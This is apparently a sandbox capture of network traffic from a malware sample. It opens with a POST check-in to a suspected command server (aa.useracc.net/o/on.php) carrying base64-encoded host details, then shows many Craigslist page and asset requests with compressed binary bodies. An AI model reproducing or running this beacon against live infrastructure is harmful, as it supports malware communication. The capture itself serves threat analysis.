.N....h..q..<a.....i.W..$=.!t<[email protected]...!o.Cq..d..5...P8w.z..
<<< skipped >>>


POST /o/on.php?74362612 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://aa.useracc.net/o/on.php?74362612
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
Host: aa.useracc.net
Content-Length: 104
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




a1=NjM2MTIwNDA1NTg4NDUyNTAwLjg2ODM=&a2=333111&uri=&vers=MTAwNjIwMTZORV
c=&uptime=MA==&b1=MQ==&b2=MzJiaXQ=

HTTP/1.1 200 OK


Date: Fri, 14 Oct 2016 08:15:30 GMT
Server: Apache/2.2.17 (Win32) mod_ssl/2.2.17 OpenSSL/0.9.8o PHP/5.3.4 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.5
Content-Length: 64
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
REMOTE_ADDR : 194.242.96.226<br>636120405588452500.8683.....HTTP
/1.1 200 OK..Date: Fri, 14 Oct 2016 08:15:30 GMT..Server: Apache/2.2.1
7 (Win32) mod_ssl/2.2.17 OpenSSL/0.9.8o PHP/5.3.4 mod_perl/2.0.4 Perl/
v5.10.1..X-Powered-By: PHP/5.3.5..Content-Length: 64..Keep-Alive: time
out=5, max=100..Connection: Keep-Alive..Content-Type: text/html..REMOT
E_ADDR : 194.242.96.226<br>636120405588452500.8683.......



GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: geo.cl.com
Connection: Keep-Alive


HTTP/1.1 301 Found
Location: hXXp://geo.craigslist.org/



GET /styles/cl.css?v=c27e72792da0a56cfce19f5d49f8838b HTTP/1.1
Accept: */*
Referer: hXXp://ukraine.craigslist.org/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.craigslist.org
Connection: Keep-Alive
Cookie: cl_b=POtOauaR5hG8X8yh_3GNqwjCTSo; cl_def_hp=ukraine


HTTP/1.1 200 OK
Cache-Control: max-age=2592000, public
Last-Modified: Thu, 06 Oct 2016 20:47:47 GMT
Date: Thu, 06 Oct 2016 20:47:47 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 9466
Content-Type: text/css; charset=UTF-8
X-Frame-Options: SAMEORIGIN
Server: Apache
Expires: Sat, 05 Nov 2016 20:47:47 GMT
...........=k..6r.. ..r...x.^..*...v.....;./S..I.R"MR3;...../6^.ww.).H
..h....F#)6....m]....P.uT...HGmG6.V*E~\......u.._....Vk.c.T.c>*.dG.
........c[7EGG.......[.....ny...jsj..Y.Uq.h...b....w.D....rD.bw\..<
/.....=..$P.QKI...Q!u..]Q..i4..S..U.]IG;.!.>.s...>.v.,i.....k..h
. .4.p.R.......O.u.p.......mx .........k._...............(M..cu.....b}
....=).........<.a.........a..].....I....4...^Fkr,.=.#[email protected]
...F>.[<g..Dc.......i.,l.#...4/H.....?....Z6.O.....3-G.a....m.}.
..m....D......y..!.a2..... .s....e....8/...&...uI..Z.J7]\l.r..>...x
?...x?.....9...Tu4.......ML6Mu|9.$...m..v....o...9-.|{..!....8...u....
qK.u...;...)>Q.....=...u.u...J.......'.s....<...T.e.o.Z.-...j.qI
......1.;........;^.n[U]..)a..{..<&...(i..2..H.H.HQ...5.Y1...4.Q...
..0...u.......S\......i....a!G{:...h(X...O19.E.?.R...v.tU..,.;......=l
.c'.1M...l..S..6C_....r9.g`..;..T.^.....ok',..5$E..$[..o*.7....d.:e.w.
.R...o.. }.....-]..Y...z.^...Kg^.-9....P. H...[T.....r.'d..i.kv....u..
.0=....E..Ur._.Qu,_.71D8..-.T.._.%g|e.M.s.7....G.}[..._..3.g.U....m...
.=9.D.....!.d.%Z<Rc0.\......X[s..M.G.V"....W%.V....sc....!.P]u....Z
.>....P...2.....P...Q<r.....r...|...|._.=...k.&..........~..j...
..X...q..J:.0.h.&.L.........k.~t>.e...bFW%.v..c^)[.W Z.SW)..}R"*{..
|[V.KV....5......2...q.$Z.-...=[..o*.$|7..W...y...|.V.c.ho..e}.:..."l.
...^].7................P..%sn.:x...:N....6.X^...._.J.p....&....wH>.
.k......$.Q...j.r..{....7...,..D....p}f....|8..-..(..vM...F,a..= ....o
.C]5.9vl.K.._.IU...8...d.. .E...{...M..E.w....6..#&Gp0..g...F..LY2
<<< skipped >>>

GET /js/html5shiv.min.js?v=096822b653643ed1af3136947e4ea79a HTTP/1.1


Accept: */*
Referer: hXXp://ukraine.craigslist.org/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.craigslist.org
Connection: Keep-Alive
Cookie: cl_b=POtOauaR5hG8X8yh_3GNqwjCTSo; cl_def_hp=ukraine


HTTP/1.1 200 OK
Cache-Control: max-age=2592000, public
Last-Modified: Sun, 25 Sep 2016 08:05:27 GMT
Date: Sun, 25 Sep 2016 08:05:27 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 1288
Content-Type: application/x-javascript; charset=UTF-8
X-Frame-Options: SAMEORIGIN
Server: Apache
Expires: Tue, 25 Oct 2016 08:05:27 GMT
..........}V.r.6... (....J.v..e.3I....&..q: ...(.. %........:...p....N
.....*.8O..*b.zKM..M....? .....F...].........H."F...%....i.5...^na....
.J..y..._....nW.7h.O..._`.2V..V,..1K j..RV.......9D...dJ\*..z..:#U..q.
Z.eD/ij.JB:.J2z.".....&&....i..Ko.T....G....R.d.&.......8....i.>'..
^....e...s.o..Nq8!..ksC...G..d.0O.r.3Pa..J....N.,8.q..I.....P..2.JqMo.
..)....5.q....6.....A.....{*...D..zO..m...{=..^..._.....4.Hi]..[.X.JW.
...).D..=.....W`[email protected].. s\[email protected] ..W...bQL..xP....I.u&l
t;.(;x.].BC....|d.!...!n..d@*.M..1...1r.=T............."f8...c.....5..
l../.F.......,....u?.E9.....P..AIjD]Q&....._..n......!..........OX.N.t
z...&..C.T..x(..a......,.8t..tU|.... .yZR.....L&a."j.d...J.0.....,....
..1./.v..0T..0zS.5.. ..V.Q...YFwY^i.j....9e. .x...j.`..&{2...'. ..AMA;
.0.*..>9.....p.......3....t.....VMf.....2.7.i.....f.s....B...o.ZB..
..6..j.H~.I\...A}.. .s..K)*n..../.|y....|...^.........................
.3.|.......M...#..6..&..P......L....H......:...~..ys1.O.W...s...y. rJ.
S...h....Yst.......X.....K...]lGvy...G...t.^.'....ap..d.IN..l.1;....L.
.9.L..2. ......K..\F0...F.:.>*i]...........Q...cF.1#....fD...Z.S I.
7............k..<...Ac.....\.h.1j...X.....5...M...b..km...VJ.W..QV.
.....U....!(8.T...CK.[|..Y...YVb....h.=C..~*bWJ....d...Y.GVo...e{t.Bz.
k$...9}>....,.4?.<?....N_... .4....l..Z7.......
<<< skipped >>>

GET /js/respond-fork.min.js?v=d7e1cb0d97ee0c0c9d84a7d4f1d03469 HTTP/1.1


Accept: */*
Referer: hXXp://ukraine.craigslist.org/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.craigslist.org
Connection: Keep-Alive
Cookie: cl_b=POtOauaR5hG8X8yh_3GNqwjCTSo; cl_def_hp=ukraine


HTTP/1.1 200 OK
Cache-Control: max-age=2592000, public
Last-Modified: Sun, 25 Sep 2016 08:05:27 GMT
Date: Sun, 25 Sep 2016 08:05:27 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 2200
Content-Type: application/x-javascript; charset=UTF-8
X-Frame-Options: SAMEORIGIN
Server: Apache
Expires: Tue, 25 Oct 2016 08:05:27 GMT
...........Wks.6....B.f.@.(.N..TZM.g.3I..=.....>@.6E..dI........O..
.xqqq...,X&..DB..5....."O.#.Z8..?s?r...<?<..d-.y....\.D].\.0... 
.dC.......X~1.s^...k&b.......w.......e... .mc..U\...`.%.&..'.-_ .H....
C.."^*>R".v..>_........3.L -...;N.../5$.T90w.{...........7..Kq.E
...u...6.[..)...V...a..y.....{......0.3..."..3.2.~sn.v`. .\.W..c....W.
q..eT.....x..EA....Qa$.M8.r..r.bI.......m....L.<...e.#..N...f......
.....#.m....U......W..?....(<.8..n..N?.?..w.C.?G^&..Ty...w.....7...
F...[..J.....<.$.%.Tb....`....I$.0.#.,.B'..........q.9..../i..R..E.
..w....}&.NBZ.S!..vd.I.qL.0..._..i.x..8.kk.%.g...a...w[B.<..(.@r...
..6.y.m_G...4............r..K.;.:..:.-..i1kO.X. .......... s..../d<
.v.O......{.):....i'p<..H.. -......<.M...ml.;..7k>h{....,....
...kc6.*......a...7....,...F..l.m.I....Oo.r...W=&.x...g*;........4....
....d*.XN.eM.c.?M...?M-p.t...............cu...$Jrg.7..G.P........2I...
Mg%.@&.....g..7M...{....,>$.C{....AM....nO.....".Y...........'..h..
O..)Z.{./.,...7|........$F..3..?......\G...);{.'..{[email protected]..
.5.."Q7..G...NpL.t.l.._..>..88........7/..g......{..(;..6...0...{.!
Z.h........{.....#X.....ytx.t.7...Pv..2......$...G....q...0.^..'......
.8f\....."u.......g..>./UH...>....\M...d...@'&....~.:.n...!tg.4C
.|.L.!.5z/.N.y.R...G..$B1...&?..JG..".....V....B.V../..........2qe/&r.
..J...m....=...a...k....6.:.5..>..........K@....`|..KB..J....C...7/
......L.|2.wy~F..._.k.. l..G|.`.........<.}Z.R.$.w.D...U.7]i7.*N}t.
.%&W........!.pEf..Q.i.:.u........@.!8..C....5Xf,*...L>..;.a,.&
<<< skipped >>>

GET /js/general-concat.min.js?v=5ebb6f264ef818c30044ad679ed9876c HTTP/1.1


Accept: */*
Referer: hXXp://ukraine.craigslist.org/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.craigslist.org
Connection: Keep-Alive
Cookie: cl_b=POtOauaR5hG8X8yh_3GNqwjCTSo; cl_def_hp=ukraine


HTTP/1.1 200 OK
Cache-Control: max-age=2592000, public
Last-Modified: Thu, 13 Oct 2016 20:50:15 GMT
Transfer-Encoding: chunked
Date: Thu, 13 Oct 2016 20:50:15 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Type: application/x-javascript; charset=UTF-8
X-Frame-Options: SAMEORIGIN
Server: Apache
Expires: Sat, 12 Nov 2016 20:50:15 GMT
1faa..............i..W.0....I$.X.......nU..0;I......TH. :....h.Q.w.so.
....o....x-.....)x7...$).{...S...'N....=...M.....*....$.....h.Y.....T.
..n....N.i...b.-..|>.L.zx....O..b.)...v.5..X.7.x..........X.}.E7.x.
...3l._.:.v:]....,... .n...A....l >F.....j.....@..........".Lv..=.7
O..yV....E>.|...?h_a.h.......'....-.a.. .2^...K/m.z.-&f.r..{.S.....
o.l`...&..,...b...-........M.>h.Z&~*..i.....m..v.L....r]...o[.L....
...W| ........j9..L.,.ERL..M...4..z.e.......t.=>.'.5..........T.i..
.qp..7..\.r3..^p.d..a...m..nD1=8.V..*.L.q..~.....A^...5..^..>..3...
..Q..L.Q {`z....e.V.....kp)...2..Ak.k.z..........RJ..].[,:..]r.(ne..&g
t;d...}>.3..9.q!E...xo..b.C...$N/...ghs9..a_.9....E. >..a.....&g
t;..P.D........C.'........U..Q.~...6}..M~S...&.Mo....6,.,.(.4...Lp...a
F."e2...o.*.I..x.f=..'2.r.,.m{t.(2...|.z......C.b...x9....x..j}......{
...i...[..._..m....g..N.m.?...(.6....t.. .. ....S...|........${..t....
.y.{..5G... ...b./..?.7..)|..`.c.*.U....E.......).j.w......n.,{....Xo.
y.... ....v...,..$.....z..6^1?....,.|.ngP.=f..._..9....bt.d.........h.
..oW.e...x...tl .9....y...74....(.`?..v.pI.>H....=.......}5.v..a...
...{kD(<...%....#. k..j......(..n.....2^.s.L..hZ.M.,..N..u.e...<
.v.G.N.A6t....~........7.-.n.X.....'..it;...4..v..F.I...77.<.M.u.Y.
.n&..{..{.L.E.d.-.s......^..s...3dq......N_..4...D..r.XJ.]p.~.3.|]..c.
...!...b..2..p=>..I>.4.....3K...=.Kr.&m(..$n...b..6..m/.....m*..
.f_.........u...bNG.T.....?."...i.[...._.Da.b.....]-.S.......|.o..Y..c
t.......[..a......f/<@P.Q1.3/.p;......:j4...N..O...c..&...2..~.
<<< skipped >>>

GET /js/homepage-concat.min.js?v=69372a831a7625a2650cba9920b95969 HTTP/1.1


Accept: */*
Referer: hXXp://ukraine.craigslist.org/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.craigslist.org
Connection: Keep-Alive
Cookie: cl_b=POtOauaR5hG8X8yh_3GNqwjCTSo; cl_def_hp=ukraine


HTTP/1.1 200 OK
Cache-Control: max-age=2592000, public
Last-Modified: Tue, 27 Sep 2016 22:51:10 GMT
Date: Tue, 27 Sep 2016 22:51:10 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 1034
Content-Type: application/x-javascript; charset=UTF-8
X-Frame-Options: SAMEORIGIN
Server: Apache
Expires: Thu, 27 Oct 2016 22:51:10 GMT
...........V.R.8...W4..V0......J%....fV],$Y....K..P][email protected]....=..
.z.W'..)...........^.&.k |g.....A.Lvl..". /j....HU...`....-m.....!'.c.
Ik........s...w%.x}&?N. ..Z....D_Q;..q..4....,.......n.....\...H...6.r
nl.^.....*f.y......I....<.m8......A.W.K........"8.5..c.(Q..f..b....
..q..YQ..xf.qzt..m..b....q.1.Fk.N.d........:.6r..=.o..O@=.z......!....
...yl~.....lb............Q.p.....M. ..]..x.........(#.d....m..;5pl.7\j
.Thl [email protected].?...|7Li.....p...|`...B..E.B.....a.M;X...........
.x.$.46..<.W.;.?.B.r;...h..H...(........ \.&h)}.....SH..^.Po.<Z.
~.:A.Z..^......I.....sHBV...l1.N<..c<|?H.G.2..-...A<....X..jD
.-..K...M2.@0.$.#.)._|r.3,I.9.g.T%\...%.i..j3.<....LI.&.....L.A....
89...L.9:=.g........h.........9.R.\.a.R...-..sX.c.VU..........d..Bw.lJ
............]./..3u.A.?...,.s. .[.`.XJC..R......j.....z/^.w.,...c..Mw.
.Q...M....{D..*.M...u..{..}...S5.....m......&.t,...KI.M....1.i.j....m.
.P...T..0.t..vx..Q..E...E.n.$;....^T.>..l..T.....!.......).v.D.,...
.[.`.{h._.......r.....m-.\;....d..EW.>.........9........(.....y..~.
[email protected]/1.1 200 OK..Cache-Control: max-age=2592000, public..La
st-Modified: Tue, 27 Sep 2016 22:51:10 GMT..Date: Tue, 27 Sep 2016 22:
51:10 GMT..Content-Encoding: gzip..Vary: Accept-Encoding..Content-Leng
th: 1034..Content-Type: application/x-javascript; charset=UTF-8..X-Fra
me-Options: SAMEORIGIN..Server: Apache..Expires: Thu, 27 Oct 2016 22:5
1:10 GMT.............V.R.8...W4..V0......J%....fV],$Y....K..P].....~@S
..l....=...z.W'..)...........^.&.k |g.....A.Lvl..". /j....HU...`..
<<< skipped >>>


GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: geo.craigslist.org
Connection: Keep-Alive


HTTP/1.1 302 Found
Last-Modified: Fri, 14 Oct 2016 08:15:49 GMT
Location: //ukraine.craigslist.org/
Date: Fri, 14 Oct 2016 08:15:49 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 21
Content-Type: text/html; charset=iso-8859-1
X-Frame-Options: SAMEORIGIN
Set-Cookie: cl_b=POtOauaR5hG8X8yh_3GNqwjCTSo;path=/;domain=.craigslist.org;expires=Fri, 01-Jan-2038 00:00:00 GMT
Server: Apache
..........S..E.l.....HTTP/1.1 302 Found..Last-Modified: Fri, 14 Oct 20
16 08:15:49 GMT..Location: //ukraine.craigslist.org/..Date: Fri, 14 Oc
t 2016 08:15:49 GMT..Content-Encoding: gzip..Vary: Accept-Encoding..Co
ntent-Length: 21..Content-Type: text/html; charset=iso-8859-1..X-Frame
-Options: SAMEORIGIN..Set-Cookie: cl_b=POtOauaR5hG8X8yh_3GNqwjCTSo;pat
h=/;domain=.craigslist.org;expires=Fri, 01-Jan-2038 00:00:00 GMT..Serv
er: Apache............S..E.l.......



GET /styles/homepage.css?v=eb9fab4ed6146817c2debef8e3632771 HTTP/1.1
Accept: */*
Referer: hXXp://ukraine.craigslist.org/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.craigslist.org
Connection: Keep-Alive
Cookie: cl_b=POtOauaR5hG8X8yh_3GNqwjCTSo; cl_def_hp=ukraine


HTTP/1.1 200 OK
Cache-Control: max-age=2592000, public
Last-Modified: Sun, 09 Oct 2016 17:56:02 GMT
Date: Sun, 09 Oct 2016 17:56:02 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 4135
Content-Type: text/css; charset=UTF-8
X-Frame-Options: SAMEORIGIN
Server: Apache
Expires: Tue, 08 Nov 2016 17:56:02 GMT
...........;...8....lUT.9.2.q..8.c:f_.a/[email protected]. ..kc:...(
3.J.]j?OD..ySq..m...&/y^.M....0...1.....z..]."..b.8.. .M^.......E>6
.4U..l.}.>..<}7.kV1.F..O....QG................6O(.P.........{...
.8...M.h.d.1I%...E...f..0B..t.ls..5.0..o9{..(...\.}.GP.7.*.C0...Z.{~..
.. .U....v})/(.....W^E..2.......~....o..a...Q[JQ2c.(..7d..g..Ww`.Z..G.
...>O.U.f}[_B..&D.G...Y.*.@.[|nbZ.M.R.Ake..a.......C...g...\..%,.~I
..9...d.....X.S......y.)@.){.......75..............D<.7........{...
....3e...-8.E.I...4.-..*.Z"..,iI~.i.H.%YH....H.'.#..t^?;.2R..PB..&4.E.
Y....zC..D.`.$"e$e..........eC^...$.ihQ...w@..._....D.... ....L)&..I..
.....$M........3.6......i.3rvbeJZ.s..V(M..e.G!Z.f..x...M.E.....SD(.h..
.4.......9u.h...!!..)....". ;R.7"...ZRw.'[email protected].....
..2/O....h..Q.... ....<2.{>w.1m.F.s.{t...>9S.k...^.6..(f Hflv
D......O....laS.?..0<JZR..b}...i..hx.k...%r.g..^..H...F.(.....-.~.[
.7..Nh..f,WvnY.o-.....G. ]....[.h6.....R....e..F....._9.h$..6".....~.9
....*....:....-......'5..:"...a.%.|.H..Z.T]....YK....o...ac......p....
.1^..<......B.Q......e.IR.../......z......a..T~8.....~.._.T.o..1...
...}...d$.........a.k........(..w.e._.....1..X.3v...F.p^.......k..v..!
E.G..G..#Xv..)f.....q.....oJ.F...3.C..8d..a..L/s.[.S~.Q.l..:?...m.K..@
.B...]. . ....>.B.........k.\C.<...._=-pX}......)$p..0.B./..Q...
]e|..'V.dM...x.G........c.$Ff..5.L...W=8n.i.:...e....\.....R.^x..SJ...
.J.--[.`>.x.}.{..7R.0...JP#.m...E`0.Y./.X...%..y......$.h.-..../..`
..L...gu-..3.=..W.o..{LN....7....6MS..)O.-....8..<.......C>5
<<< skipped >>>

GET /styles/jquery-ui-clcustom.css?v=31607a98a2cb3fba2c70e3e66ecb4440 HTTP/1.1


Accept: */*
Referer: hXXp://ukraine.craigslist.org/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.craigslist.org
Connection: Keep-Alive
Cookie: cl_b=POtOauaR5hG8X8yh_3GNqwjCTSo; cl_def_hp=ukraine


HTTP/1.1 200 OK
Cache-Control: max-age=2592000, public
Last-Modified: Sat, 24 Sep 2016 09:57:43 GMT
Date: Sat, 24 Sep 2016 09:57:43 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 7544
Content-Type: text/css; charset=UTF-8
X-Frame-Options: SAMEORIGIN
Server: Apache
Expires: Mon, 24 Oct 2016 09:57:43 GMT
...........=iS..........u{..8q...W.....d....rb.-^.....dIv.H.L..zP=....
.]G[8...........[....Y.tV...bI.JE.\......;......2......]K1..x...v...y.
....syf.G.x......P....&.d..Qu."..o......`..~.V.}......Y..{.?....'.....
o&.I..........- z.|y..m......0.7P.7..... [j..U].....aN.;O.i.;G..m..=..
M.......!pU...#^_.P...O.<....}.6..e..l|.......... .}Y...g..~...m.v;
@...T..l|.[?p.i^.......<[....9.9...;.Q....Y...&....B.E..]Wl .F..'..
........ q.!.9.^.Y.Zc...,..v.E.5P...\D.sC......4.Q.Z..!.Q..~.lD.u....^
[email protected].=...7a..Z..... ... g........z'....s....f..9.Om.5
.H..... ~'[email protected]].M.j...G.F..2..........V.. ..yVp{#..nS..\...z..O..
.{.B...T.w...."zQ.n.......BV.M.$i.Q$.1A......,-.AIS.&.[.<....i....@
.....t..s..............t..Q>.a.t..b......z...].....c.....Y...`8....
..k.....pa....{-.......f..vQ.T...p....b....\.......4ew.[.B.9.$..7....#
..n.!.....2~.....|p..U..RHr..!....b.?f..|C.....O..9 _..~...:..........
WpQ*...q<.....S.b.......hp.>...5..{....o..#m...0)(p....\D....Z..
......7u ......_...rEj.?...j.z.U..}.;M7 ....,...........B.?..R.6..Z=.V
...:.W. ......'[email protected]....}h*....b../.8
....P%@MKO.....a....tw............Z.r\..zw.L.0...G..f88f.,......3.a.4.
N..a.......,q..".[..D..A)....!H..."C...x|*02|.....!....!..<1.v.....
l"2.<.....x17^.....#D1.-.<.1...j1S^....X#.`B]Y.......,....i.....
cR.......F. %... .2.^.*T.....S..E&U.$..)X!......L.#.rl....e.]D.'t.<
..c....B.?5`^&.....e-L...P....3......!..j#.$.vD.C...H0.`=......X...:..
.N....h..q..<a.....i.W..$=.!t<[email protected]...!o.Cq..d..5...P8w.z..
<<< skipped >>>

GET /js/json2.min.js?v=178d4ad319e0e0b4a451b15e49b71bec HTTP/1.1


Accept: */*
Referer: hXXp://ukraine.craigslist.org/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.craigslist.org
Connection: Keep-Alive
Cookie: cl_b=POtOauaR5hG8X8yh_3GNqwjCTSo; cl_def_hp=ukraine


HTTP/1.1 200 OK
Cache-Control: max-age=2592000, public
Last-Modified: Sun, 25 Sep 2016 18:57:15 GMT
Date: Sun, 25 Sep 2016 18:57:15 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 1328
Content-Type: application/x-javascript; charset=UTF-8
X-Frame-Options: SAMEORIGIN
Server: Apache
Expires: Tue, 25 Oct 2016 18:57:15 GMT
...........V...6..n....\.!c|w..<......i.3.>[email protected]|.i
;}(.b.....C .EV.?.\..nm.....,m......fGZ.-..R...k...3..G...k...Z.h.Z...
s....?..Zs..\.j......#.J.r!....(`.[QY1....D4...ZWY1'....*S ..>...86
...|.\..m..7..........S..y..Gg............-X...,a........e<F4.]....
..H./..."...:...............e..... E..1.,...ft#E.v....w.......s...0..g
Ef..> ..A .I. ..\....r.....t...~../2.g...X.&.g..B.9."F.n.....}.~.k.
pWU.Ktj.%W.V.=X.2, ;.X...........T:|B...8&JB\........&....."..( ..8.o.
........!H-...$ ....c...L...I.....v.1i.ANP.....N ..x..7L....US/....ul.
........S...B...Avi......._.r.*}.UO..._L|!..........d.(....v(...h|/.zP
...y......B7..V...NmJgf>[email protected]...&....l.....?.MU...
x..h..= .Q.,.N.;...[...'.~0..).......<.HK.....8..l.8...s.......^.6.
............R.O....L.=39.I.R...Y.K..|...h..p....4\_.@\.............0&x
..P._.J..5.d.dj......a....^.34L...............{(...!]p.0..>I.O9!=`.
v.}[email protected]=.t..:.&.m:m....V...H.a.-%.v}..,>.....k.Z..4}. .x}..T/...*..
.....y.....lJ....xX@Q./.n%.Z..f&C..Zk..mv........xt.s..........RbGU..Q
.$..$.....-...^p...^N...\ie.l.l......h........U.4er....S..2B.o....I...
'T.5....e.OA.1...ut..x0..7.C{..X..8-*.m...].Q.f.>.........a..>.~
[email protected]`....c:....(p.Q..:[email protected].
 z.P..w....d..r..>.r:T..}.....M)..Xk....ckCj......!..,N.%....\*y.\.
IO\.N...OO/.W......%i[.x....._........
<<< skipped >>>

GET /static/localstorage.html?v=51a29e41f8e978141e4085ed4a77d170 HTTP/1.1


Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://ukraine.craigslist.org/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.craigslist.org
Connection: Keep-Alive
Cookie: cl_b=POtOauaR5hG8X8yh_3GNqwjCTSo; cl_def_hp=ukraine


HTTP/1.1 200 OK
Cache-Control: max-age=2592000, public
Last-Modified: Tue, 11 Oct 2016 22:53:26 GMT
Date: Tue, 11 Oct 2016 22:53:26 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 508
Content-Type: text/html; charset=UTF-8
Server: Apache
Expires: Thu, 10 Nov 2016 22:53:26 GMT
...........TQo.0.~N~....."...t..>LB...e....%.5vd.X...g.....=.......
........~<@n.~7...X.s.Y;.S.*v0`..\...k.gZ.v...9...-.x/.....f".5.2..
IAr.......4..TQ...i...._>D...?..g&..@aHv&.2.....%....:...f\...G#...
.5.... ..N..&6I.~....$o.4...o.R......(..~.(.t.]..rm.=<.A.ux.-:.".v.
H...H..(........ .Ra......HE..T/L.G.Za.<..2..-l.t2V.b5..5.h.....,aA
..4..../BB.Y.}.t.~...5...A)..w.4......v..i..R. _....&....p...t...a{...
.<..i.f..}...-.vo....!F_c:.:X..........;u....nY....m.C.....i..q>
cj.g.I.G.....F. .oev..#..[..*..o...B...HTTP/1.1 200 OK..Cache-Control:
 max-age=2592000, public..Last-Modified: Tue, 11 Oct 2016 22:53:26 GMT
..Date: Tue, 11 Oct 2016 22:53:26 GMT..Content-Encoding: gzip..Vary: A
ccept-Encoding..Content-Length: 508..Content-Type: text/html; charset=
UTF-8..Server: Apache..Expires: Thu, 10 Nov 2016 22:53:26 GMT.........
....TQo.0.~N~....."...t..>LB...e....%.5vd.X...g.....=..............
.~<@n.~7...X.s.Y;.S.*v0`..\...k.gZ.v...9...-.x/.....f".5.2..IAr....
...4..TQ...i...._>D...?..g&..@aHv&.2.....%....:...f\...G#....5.... 
..N..&6I.~....$o.4...o.R......(..~.(.t.]..rm.=<.A.ux.-:.".v.H...H..
(........ .Ra......HE..T/L.G.Za.<..2..-l.t2V.b5..5.h.....,aA..4....
/BB.Y.}.t.~...5...A)..w.4......v..i..R. _....&....p...t...a{....<..
i.f..}...-.vo....!F_c:.:X..........;u....nY....m.C.....i..q>cj.g.I.
G.....F. .oev..#..[..*..o...B.......
<<< skipped >>>

GET /images/sprite-16px.png HTTP/1.1


Accept: */*
Referer: hXXp://ukraine.craigslist.org/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.craigslist.org
Connection: Keep-Alive
Cookie: cl_b=POtOauaR5hG8X8yh_3GNqwjCTSo; cl_def_hp=ukraine


HTTP/1.1 200 OK
Cache-control: public, max-age=86400
Last-Modified: Thu, 13 Oct 2016 20:38:20 GMT
Accept-Ranges: bytes
Date: Thu, 13 Oct 2016 23:15:20 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 6355
Content-Type: image/png
X-Frame-Options: SAMEORIGIN
Server: Apache
.............C..PNG........IHDR.......0......(......IDATx..Z.X.....e.i
.7.....9...j.....!.V^[email protected]..'*.........Q..A.A.....3.``N..w..C...@..?
....y^...z...^.;.'...k..P..S.g0P..T.<.$...(...G..x......@...$.=...-
......:@..@. .H.........h.c..J.\.LY...$.p....V....7........v..@x......
.D.0............c @n?.......^uu....*.WU.9...NTK,)..F......t...~..._...
.=QU].._RY..]~.......~...Uy.r]C...e..rn.U..M-...R....c!e..O.9.........
